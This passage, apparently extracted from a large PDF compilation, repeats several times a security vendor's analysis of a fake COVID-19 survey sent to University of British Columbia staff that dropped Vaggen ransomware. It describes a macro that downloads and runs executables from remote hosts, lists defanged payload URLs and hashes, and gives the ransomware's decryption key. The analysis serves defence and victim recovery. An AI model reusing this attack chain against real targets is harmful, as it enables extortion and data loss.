This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 353 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 354 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 355 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM 
Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 356 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 357 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 358 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 359 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 360 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 361 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 362 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 363 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 364 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 365 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 366 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 367 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 368 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a

This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in order to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:
- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the Shell function to execute killar.exe
- Checks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)
- If successful, it sends a GET HTTP request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it isn’t successful, it sends a GET HTTP request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event.

This can be very useful as an early warning system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.

- main_LAMNARDETTA -> main_enumDir
- main_ELDBJORT -> main_encryptFile
- main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode.

The encryption algorithm is similar to the one demonstrated here.
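As an added example, not code from the original post or from the malware itself, here is how the file layout the analysis describes (the 12-byte nonce, then the ciphertext, then the 16-byte GCM tag) can be parsed and decrypted with Go's standard crypto/cipher package, which is the gcm.Open counterpart of the gcm.Seal call the sample uses. The key is the 32-byte string quoted in the write-up; the function names recoverVaggen, recoverFile, sealSample and newGCM, the constructed sample plaintext, and the sealSample helper that produces a blob in the same layout for offline testing are assumptions made for this example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io"
	"os"
	"strings"
)

// Key quoted in the write-up: exactly 32 bytes, hence AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // standard GCM nonce, the first 12 bytes of a .VAGGEN file
	tagSize   = 16 // GCM authentication tag appended to the ciphertext by gcm.Seal
)

// newGCM builds the AES-256-GCM AEAD used by both directions.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("key must be 32 bytes for AES-256, got %d", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// recoverVaggen takes the raw bytes of a .VAGGEN file laid out as
// nonce || ciphertext || tag and returns the original plaintext.
// gcm.Open expects ciphertext||tag as one slice, which is exactly what
// gcm.Seal produced, so only the nonce has to be split off.
func recoverVaggen(blob, key []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, fmt.Errorf("blob of %d bytes is too short to hold a nonce and a tag", len(blob))
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, sealed := blob[:nonceSize], blob[nonceSize:]
	// Open verifies the tag before releasing any plaintext, so a wrong key or
	// a damaged file produces an error instead of silently wrong output.
	plaintext, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("decryption failed (wrong key or damaged file): %w", err)
	}
	return plaintext, nil
}

// recoverFile decrypts one .VAGGEN file and writes the plaintext next to it
// under the original name, refusing to overwrite anything that already exists.
// Assumed helper for this example, not part of the analysed sample.
func recoverFile(path string) error {
	if !strings.HasSuffix(path, ".VAGGEN") {
		return fmt.Errorf("%s does not carry the .VAGGEN extension", path)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	plaintext, err := recoverVaggen(blob, []byte(vaggenKey))
	if err != nil {
		return err
	}
	f, err := os.OpenFile(strings.TrimSuffix(path, ".VAGGEN"), os.O_WRONLY|os.O_CREATE|os.O_EXCL, 0o600)
	if err != nil {
		return err
	}
	defer f.Close()
	_, err = f.Write(plaintext)
	return err
}

// sealSample produces a blob in the same nonce||ciphertext||tag layout so the
// recovery routine can be exercised offline. Constructed test data only.
func sealSample(plaintext, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst; passing the nonce as dst yields the layout.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

func main() {
	sample, key := []byte("constructed sample document contents"), []byte(vaggenKey)
	blob, err := sealSample(sample, key)
	if err != nil {
		panic(err)
	}
	got, err := recoverVaggen(blob, key)
	fmt.Printf("blob %d bytes, recovered intact: %v, err: %v\n", len(blob), bytes.Equal(got, sample), err)
}
```

The reason recovery works without the attacker's cooperation is visible in the code: the key lives in the binary, the nonce is stored in clear at the front of each file, and GCM is symmetric, so everything needed to call gcm.Open is in the victim's hands. The tag check is also why a recovery tool should never write output on error: a mismatched key or a truncated file fails closed rather than producing corrupted plaintext.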
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 407 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 408 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 409 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 410 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 411 of 
